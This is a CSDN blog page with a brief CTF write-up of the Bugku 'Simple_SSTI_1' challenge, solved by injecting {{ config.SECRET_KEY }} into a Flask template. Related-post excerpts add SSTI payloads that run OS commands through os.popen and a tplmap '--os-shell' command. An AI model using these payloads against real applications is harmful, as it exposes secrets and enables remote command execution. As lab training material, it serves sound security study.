CTF刷题刷题经验累积2 Simple_SSTI_1---bugku

最新推荐文章于 2023-12-13 16:10:36 发布
最新推荐文章于 2023-12-13 16:10:36 发布
阅读量672 收藏
点赞数 2
分类专栏: CTF刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43508668/article/details/116670592
版权

打开发现让传入一个名为flag的参数在这里插入图片描述
F12直接查看
在这里插入图片描述
最下面说在flask里,我们经常建立一个SECRET_KEY,上方模板注入

直接访问URL+?flag={{ config.SECRET_KEY}}得到flag。
在这里插入图片描述

Overlap.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu CTFSimple_SSTI_2
weixin_42557264的博客
09-16 1865
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
BUGKU-CTF入门笔记
Emooooor的博客
11-29 2282
CTF,BUGKU,入门
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 3027
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
Simple_SSTI_2
天天学安全专属博客
03-03 963
Simple_SSTI_2,backup靶场
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2495
首先打开之后是上面这样,目有提示是ssti,所以
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
【BugKu 笔记】【Simple_SSTI_1】
一个程序员
02-20 1447
文章目录0x01 目0x02 解0x03 知识点1. flask 与 secret_key2. 模板注入 0x01 目 0x02 解 输入url为: http://114.67.175.224:19636/?flag={{config.SECRET_KEY}} 即可得到flag 0x03 知识点 初学者, 在网上搜解思路很容易可以找到。 但是不知其所以然所以整理一下知识点: 包含以下知识点: 1. flask 与 secret_key flask是一个轻量级的可定制框架,使用Python语言
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2)
时光隧道
06-22 6075
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
Bugku:Simple_SSTI_2(小宇特详解)
小宇的web博客
06-17 2355
Bugku:Simple_SSTI_2(小宇特详解) 1.这里还是提示模板注入。这里ls查看存在的文件 /?flag={{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }} 2.这里先查看app文件 ?flag={{ config.class.init.globals[‘os’].popen(‘ls …/app/’).read() }} 3.这里由于没有过滤可以直接访问 ?flag={{ config.class.init.globals[
BugKu-Web-Simple_SSTI_1&Simple_SSTI_2(浅析SSTI模板注入!)
m0_73734159的博客
12-13 1127
服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问。{{}}是模板变量的用法。在模板中,想要展示视图向模板渲染的变量,需要使用{{变量}}进行接收。这些文件包含了程序运行所需的设置和参数,使得程序可以根据配置文件的内容进行适应性调整。唉,我不免耸了耸肩,有些无奈,并未发现什么有用的。对于这段命令,在第一,我也是有所提及,相差不大。
Bguku CTF 每日一 Simple_SSTI_1
彼岸花苏陌的博客
01-13 620
Simple_SSTI_1 进入场景 发现出现了提示 要我们输入flag为参数 输入后发现显示了 因为目提示是SSTI,于是输入{{2*4}} 发现得到了8 确定存在SSTI 但是仅仅如此 按下f12 发现注释里有提示 You know, in the flask, We often set a secret_key variable. 所以说是flask模板注入 注释提示我们去找变量 于是就传flag={{config}} 从返回中找到答案 ...
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5418
bugku-ctf
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 609
考点: ①SSTI注入 最近学了学python ssti注入,找一道练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道比较简单,什么敏感关键词都没有过滤 ...
BugKu——Simple_SSTI_1——web
h_adam的博客
03-23 3887
SSTI模板注入 具体查看> 模板注入 打开发现让传入一个名为flag的参数 Ctrl+U查看源码 最下面说在flask里,我们经常建立一个SECRET_KEY,上方模板注入 直接访问URL+?flag={{ config.SECRET_KEY}}得到flag。 SSTI(服务器模板注入) ...
SSTI
qq_51301115的博客
05-11 359
Simple_SSTI_1 ?flag={{1*1}} 得到回显1,存在注入点 查看页面源代码,得到提示we often set a secret_key variable flag是通过secret_key方法生成的加密字符串 ?flag={{config.SECRET_KEY}} 得到flag 使用tplmap python tplmap.py -u "url/?flag={{}}" python tplmap.py -u "url/?flag={{}}" --os-shell 提权成功,可以查
我的ctfwp笔记
最新发布
03-25
本笔记记录了作者在CTF(Capture The Flag)比赛中的经验,特别关注于一道名为"whitegive_pwn"的挑战。该目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值